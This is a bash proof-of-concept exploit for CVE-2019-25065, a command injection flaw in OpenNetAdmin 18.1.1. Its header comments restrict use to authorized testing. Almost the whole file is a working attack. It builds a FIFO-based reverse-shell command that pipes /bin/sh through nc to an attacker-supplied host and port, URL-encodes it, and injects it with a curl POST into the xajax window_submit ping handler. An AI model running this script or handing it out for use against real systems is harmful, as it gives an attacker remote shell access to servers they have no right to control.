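#!/bin/bash
#
# PoC for CVE-2019-25065: OS command injection in OpenNetAdmin (ONA) v18.1.1
# through the xajax "window_submit" handler. The script injects a FIFO-based
# reverse-shell payload that connects back to --lhost:--lport; open a listener
# there before running it (e.g. `nc -lnvp 443`).
#
# Only use against systems you are authorized to test. The payload leaves a
# FIFO at /tmp/f on the target and the resulting shell is plaintext on the
# wire, so clean up and treat the session as observable.
#
# Dependencies: curl, and `urlencode` from the gridsite-clients package.

#######################################
# Print usage text to stdout.
# Globals:   none
# Arguments: none
#######################################
display_help() {
  echo "This is a POC of CVE-2019-25065 - OS command injection in OpenNetAdmin v18.1.1"
  echo "The exploit runs a reverse shell command on the target system."
  printf '%s\n\n' "When running the exploit, make sure to open a listener in the port you specified in the lport parameter."
  printf 'Usage: %s [options]\n\n' "$0"
  echo "Options:"
  echo " -u, --url url of the ONA web interface ; example: http://remote_server/ona/"
  echo " --lhost listening host"
  echo " --lport listening port"
  printf '%s\n\n' " -h, --help Display help information"
  echo "### dependencies: gridsite-clients package"
}

#######################################
# Print a message to stderr and exit 1.
# Arguments: $* - message (may contain several lines)
#######################################
die() {
  printf '%s\n' "$*" >&2
  exit 1
}

# getopt diagnostics go to a private temp file rather than a fixed /tmp path,
# which another local user could pre-create or symlink. Removed on exit.
err_file=$(mktemp) || die "exploit.sh: cannot create temp file"
trap 'rm -f -- "$err_file"' EXIT

if ! OPTIONS=$(getopt -o "hu:" --long "help,url:,lhost:,lport:" -n exploit.sh -- "$@" 2> "$err_file"); then
  # getopt already wrote "option requires an argument" with the option name.
  if grep -q "requires" "$err_file"; then
    die "$(cat "$err_file")"$'\n'"Use -h/--help for help"
  fi
  # Otherwise pull the offending flag(s) out of getopt's quoted message.
  error_flags=$(awk -F\' '{print $2}' "$err_file" | tr -d "\n")
  die "exploit.sh: invalid option -- '$error_flags'"$'\n'"Use -h/--help for help"
fi

# Re-inject the normalized option list as positional parameters.
if ! eval set -- "$OPTIONS"; then
  die "$(cat "$err_file")"
fi

while true; do
  case "$1" in
    -u | --url) URL="$2"; shift 2 ;;
    --lhost) lhost="$2"; shift 2 ;;
    --lport) lport="$2"; shift 2 ;;
    -h | --help) display_help; exit 0 ;;
    --) shift; break ;;
    *) die "exploit.sh: unexpected argument '$1'" ;;  # unreachable with enhanced getopt
  esac
done

[[ -n "$URL" ]]   || die "exploit.sh: option -u/--url is required"$'\n'"Use -h/--help for help"
[[ -n "$lhost" ]] || die "exploit.sh: option --lhost is required"$'\n'"Use -h/--help for help"
[[ -n "$lport" ]] || die "exploit.sh: option --lport is required"$'\n'"Use -h/--help for help"

# --lhost/--lport are spliced verbatim into the injected shell command, so a
# stray space or metacharacter would silently break the payload on the target.
[[ "$lport" =~ ^[0-9]+$ && "$lport" -ge 1 && "$lport" -le 65535 ]] \
  || die "exploit.sh: --lport must be a TCP port number (1-65535)"
[[ "$lhost" =~ ^[A-Za-z0-9._:-]+$ ]] \
  || die "exploit.sh: --lhost must be a hostname or IP address"

command -v urlencode > /dev/null 2>&1 || die "'gridsite-clients' package is not installed"
command -v curl > /dev/null 2>&1 || die "curl is not installed"

# FIFO reverse shell; works with netcat builds that lack -e.
# Leaves /tmp/f behind on the target — remove it when finished.
cmd="rm -f /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | nc $lhost $lport > /tmp/f"
# Quoted so urlencode receives one argument and encodes the spaces as well.
e_cmd=$(urlencode "$cmd")

echo "[+] exploit started, make sure to open a listener at the port you specified (example: nc -lnvp 443)"
sleep 3
# Injection point: the "ip=>" value of the xajax ping tooltip request; the
# surrounding ';' terminate the server-side command on both sides of ours.
# xajaxr is just a client-side timestamp nonce. -m 8 bounds the request —
# presumably the response never completes while the shell is attached, so
# curl is expected to time out rather than fail outright.
curl -m 8 --silent -d "xajax=window_submit&xajaxr=1574117726710&xajaxargs[]=tooltips&xajaxargs[]=ip%3D%3E;$e_cmd;&xajaxargs[]=ping" "$URL"
echo "[+] done"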